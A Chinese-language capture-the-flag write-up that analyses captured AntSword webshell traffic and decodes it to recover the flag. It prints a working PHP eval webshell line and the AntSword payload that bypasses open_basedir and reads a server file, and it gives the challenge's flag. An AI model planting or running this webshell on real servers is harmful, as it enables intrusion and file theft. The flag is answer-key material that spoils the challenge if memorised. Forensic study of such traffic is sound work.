流量分析,WebShell,蚁剑AntSword,DASCTF,风二西Tags:流量分析,WebShell,蚁剑AntSword
0x00. 题目
附件路径:https://pan.baidu.com/s/1GyH7kitkMYywGC9YJeQLJA?pwd=Zmxh#list/path=/CTF附件
附件名称:202312_风二西_蚁剑流量.zip
0x01. WP
1. 过滤数据包,分析POST请求
http.request.method==POST
2. 定位交互请求,并进行解码
请求包
#请求包:
air=@eval(@base64_decode($_POST['jb4b82d0a4c3d5']));
&jb4b82d0a4c3d5=@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.bec1c";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};
};;
function asenc($out){return @base64_encode($out);};
function asoutput(){$output=ob_get_contents();ob_end_clean();echo "6cd90"."8f25c4";echo @asenc($output);echo "c50d"."3d1e0";
}
ob_start();
try{$F=base64_decode(substr($_POST["o0cf98c06c2285"],2));$P=@fopen($F,"r");echo(@fread($P,filesize($F)?filesize($F):4096));@fclose($P);;
}
catch(Exception $e){echo "ERROR://".$e->getMessage();
};
asoutput();die();
&o0cf98c06c2285=ysL1VzZXJzL2NoYW5nL1NpdGVzL2Fpci9mbGFnLnR4dA==# 混淆前缀:6cd908f25c4
# 混淆后缀:c50d3d1e0
# 请求文件:/Users/chang/Sites/air/flag.txt
响应包
#响应包:
NDQ0MTUzNDM1NDQ2N2IzNTM0NjY2MzM5MzEzNjYyMzMzMzM1MzczNjY2Mzg2MzY0NjUzMjYzMzQzMTM0Mzc2NDM4MzkzMzMyMzI2NTMwN2Q=Base64Decode=>4441534354467b35346663393136623333353736663863646532633431343764383933323265307dHEX2CHR=>DASCTF{54fc916b33576f8cde2c4147d89322e0}